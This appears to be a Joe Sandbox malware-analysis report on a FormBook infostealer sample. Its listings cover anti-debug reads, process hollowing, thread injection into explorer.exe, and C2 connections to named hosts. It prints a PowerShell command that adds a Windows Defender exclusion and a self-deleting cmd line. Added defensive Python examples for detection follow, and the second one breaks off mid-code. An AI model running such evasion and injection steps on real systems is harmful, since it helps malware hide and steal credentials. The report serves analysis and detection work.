          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h] (listed 3 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h] (listed 6 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2AE44 mov eax, dword ptr fs:[00000030h] (listed 2 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h] (listed 5 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h] (listed 3 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C98E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9A61C mov eax, dword ptr fs:[00000030h] (listed 2 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D1FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C78794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h] (listed 3 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\Desktop\MAPO-PI.exe Memory allocated: page read and write | page guard
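The `mov eax, dword ptr fs:[00000030h]` entries above are reads of the PEB pointer: in a 32-bit process (the injected code runs in SysWOW64 binaries, so it is 32-bit) `fs:[0x30]` is the TEB field that points to the PEB, and reading it lets code inspect `PEB.BeingDebugged`, `PEB.NtGlobalFlag` or walk `PEB.Ldr` for loaded-module names without calling an API that a hook could intercept. The `Process queried: DebugPort` lines are the API-based counterpart (`NtQueryInformationProcess` with `ProcessDebugPort`). The report only lists the reads, not what the code does with the pointer. The following static triage scanner is an added example, not code from Joe Sandbox or from the sample: it finds the standard x86 encodings of `mov r32, fs:[0x30]` in a code buffer and tags each read with the first well-known PEB field access that follows it. The byte buffer it scans is constructed for the example, not extracted from MAPO-PI.exe.

```python
"""Static triage for fs:[0x30] (PEB pointer) reads in 32-bit x86 code.
Added example, not Joe Sandbox or sample code.  The instruction encodings
are the standard Intel ones; SAMPLE is a constructed fragment."""
import re
from dataclasses import dataclass
from typing import List, Optional

# "mov <reg32>, dword ptr fs:[0x30]": 64 = FS override, A1 = mov eax, moffs32,
# 8B /r with mod=00 rm=101 = r32 <- [disp32].  Register index is Intel order.
PEB_READS = {
    b"\x64\xa1\x30\x00\x00\x00": ("mov eax, fs:[0x30]", 0),
    b"\x64\x8b\x05\x30\x00\x00\x00": ("mov eax, fs:[0x30]", 0),
    b"\x64\x8b\x0d\x30\x00\x00\x00": ("mov ecx, fs:[0x30]", 1),
    b"\x64\x8b\x15\x30\x00\x00\x00": ("mov edx, fs:[0x30]", 2),
    b"\x64\x8b\x1d\x30\x00\x00\x00": ("mov ebx, fs:[0x30]", 3),
}
PEB_READ_RE = re.compile(b"|".join(re.escape(k) for k in PEB_READS))


@dataclass
class Hit:
    va: int                   # virtual address of the fs:[0x30] read
    insn: str                 # decoded instruction
    follow_up: Optional[str]  # PEB field touched within the window, if recognised


def _modrm_class(base_reg: int) -> bytes:
    """Regex character class of ModRM bytes with mod=01 (disp8), rm=base_reg, any reg."""
    return b"[" + b"".join(re.escape(bytes([0x40 | (r << 3) | base_reg])) for r in range(8)) + b"]"


def _follow_up_patterns(base_reg: int):
    """Classic uses of the PEB pointer held in base_reg.  Assumption: the report
    shows only the read; these are the checks it is normally paired with."""
    cls = _modrm_class(base_reg)
    return [
        (re.compile(b"\x0f\xb6" + cls + b"\x02"), "PEB.BeingDebugged"),  # movzx r32, byte [reg+2]
        (re.compile(b"\x80" + re.escape(bytes([0x78 | base_reg])) + b"\x02\x00"),
         "PEB.BeingDebugged"),                                            # cmp byte [reg+2], 0
        (re.compile(b"\x8b" + cls + b"\x68"), "PEB.NtGlobalFlag"),        # mov r32, [reg+0x68]
        (re.compile(b"\x8b" + cls + b"\x0c"), "PEB.Ldr"),                 # mov r32, [reg+0x0c]
    ]


def scan_peb_reads(code: bytes, base_va: int, window: int = 16) -> List[Hit]:
    """Return every fs:[0x30] read in `code`, tagged with the first recognised
    PEB field access in the following `window` bytes.  Heuristic: it does not
    disassemble, so a coincidental byte match inside the window is possible."""
    hits = []
    for m in PEB_READ_RE.finditer(code):
        insn, reg = PEB_READS[m.group(0)]
        tail = code[m.end(): m.end() + window]
        follow = next((label for pat, label in _follow_up_patterns(reg) if pat.search(tail)), None)
        hits.append(Hit(base_va + m.start(), insn, follow))
    return hits


# Constructed 32-bit fragment: a BeingDebugged check, an NtGlobalFlag check,
# and a bare PEB read whose use lies outside the window.
SAMPLE = (
    b"\x55\x8b\xec"                  # push ebp; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"      # mov eax, fs:[0x30]
    b"\x0f\xb6\x40\x02"              # movzx eax, byte ptr [eax+2]   ; BeingDebugged
    b"\x85\xc0"                      # test eax, eax
    b"\x75\x10"                      # jnz debugger_found
    b"\x64\x8b\x0d\x30\x00\x00\x00"  # mov ecx, fs:[0x30]
    b"\x8b\x41\x68"                  # mov eax, [ecx+0x68]           ; NtGlobalFlag
    b"\x83\xe0\x70"                  # and eax, 0x70                 ; heap debug flags
    b"\x64\xa1\x30\x00\x00\x00"      # mov eax, fs:[0x30]            ; use not in window
    b"\x33\xc9"                      # xor ecx, ecx
    b"\x5d\xc3"                      # pop ebp; ret
)

if __name__ == "__main__":
    for h in scan_peb_reads(SAMPLE, 0x401000):
        print(f"{h.va:#010x}  {h.insn:<22} {h.follow_up or '-'}")
```

Run against a dumped code section (for instance the unpacked `3.2.MAPO-PI.exe.400000.0.unpack` artifact named in the Yara section) with the section's virtual address as `base_va`; a read with no recognised follow-up is not noise, it is just a use the window does not cover, and should be looked at in a disassembler.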

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 159.65.10.143 80
          Source: C:\Windows\explorer.exe Domain query: www.lifeinformpodcast.com
          Source: C:\Windows\explorer.exe Domain query: www.transforming-leadership.com
          Source: C:\Windows\explorer.exe Domain query: www.diofis.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Network Connect: 109.232.217.55 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\MAPO-PI.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 8B0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write (listed 2 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\MAPO-PI.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\MAPO-PI.exe Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3472
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe' (listed 3 times)
          Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.240240784.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Users\user\Desktop\MAPO-PI.exe VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (listed 2 times)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (listed 3 times)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (listed 3 times)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (listed 2 times)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (listed 2 times)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          The original matrix is one column per tactic; it is listed here per tactic. The digits that follow a technique name are the signature-count badges of the original matrix, run together with the name by extraction and kept as given.

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
          Execution: Shared Modules 1; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
          Privilege Escalation: Process Injection 512; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
          Defense Evasion: Rootkit 1; Masquerading 1; Disable or Modify Tools 11; Virtualization/Sandbox Evasion 31; Process Injection 512; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 2; Software Packing 11; File Deletion 1
          Credential Access: Credential API Hooking 1; Input Capture 1; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
          Discovery: Query Registry 1; Security Software Discovery 221; Process Discovery 2; Virtualization/Sandbox Evasion 31; Application Window Discovery 1; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 112; System Network Connections Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
          Collection: Credential API Hooking 1; Input Capture 1; Archive Collected Data 1; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
          Command and Control: Encrypted Channel 1; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 13; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

          Behavior Graph

          Behavior Graph ID: 510736
          Sample: MAPO-PI.exe
          Start date: 28/10/2021
          Architecture: WINDOWS
          Score: 100

          Sample-level signatures:
          • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          • Found malware configuration
          • Malicious sample detected (through community Yara rule)
          • 8 other signatures

          Process tree (each line shows which process started or injected the next one, with the signatures attributed to it):

          MAPO-PI.exe (started)
            dropped: C:\Users\user\AppData\...\MAPO-PI.exe.log (ASCII)
            • Adds a directory exclusion to Windows Defender
            • Tries to detect virtualization through RDTSC time measurements
            ├─ powershell.exe (started)
            │    └─ conhost.exe (started)
            └─ MAPO-PI.exe (started, second instance)
                 • Modifies the context of a thread in another process (thread injection)
                 • Maps a DLL or memory area into another process
                 • Sample uses process hollowing technique
                 • Queues an APC in another process (thread injection)
                 └─ explorer.exe (injected)
                      network: www.transforming-leadership.com, 159.65.10.143, source port 49790, destination port 80, DIGITALOCEAN-ASNUS, United States
                      network: diofis.com, 109.232.217.55, source port 49795, destination port 80, AEROTEK-ASTR, Turkey
                      network: 3 other IPs or domains
                      • System process connects to network (likely due to code injection or exploit)
                      └─ cmmon32.exe (started)
                           • Self deletion via cmd delete
                           • Modifies the context of a thread in another process (thread injection)
                           • Maps a DLL or memory area into another process
                           • Tries to detect virtualization through RDTSC time measurements
                           └─ cmd.exe (started)
                                └─ conhost.exe (started)
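          The chain in the graph is what a detection engineer takes away from this report: the .NET dropper launches PowerShell to add a Defender exclusion and starts a second copy of itself, the copy hollows and injects explorer.exe, the injected explorer.exe starts cmmon32.exe, and cmmon32.exe runs cmd.exe to delete the original file. The Python below is an added example and is not part of the Joe Sandbox report: it runs three process-tree rules over constructed process-creation events whose parent/child shape copies the graph. The PIDs, image paths and command lines (the exclusion path and the del target in particular) are assumptions, because the report does not print them.

```python
"""Process-tree rules for the execution chain shown in the behavior graph.

Added example, not part of the Joe Sandbox report. The event list below is
constructed: parent/child relationships copy the graph, but PIDs, image paths
and command lines are assumptions (the report does not print them).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # lower-cased base name, as a Sysmon event 1 / 4688 feed would give it
    path: str      # full image path
    cmdline: str


# Constructed events mirroring the graph: dropper -> powershell.exe (Defender
# exclusion) and a second copy of itself; the copy injects explorer.exe, which
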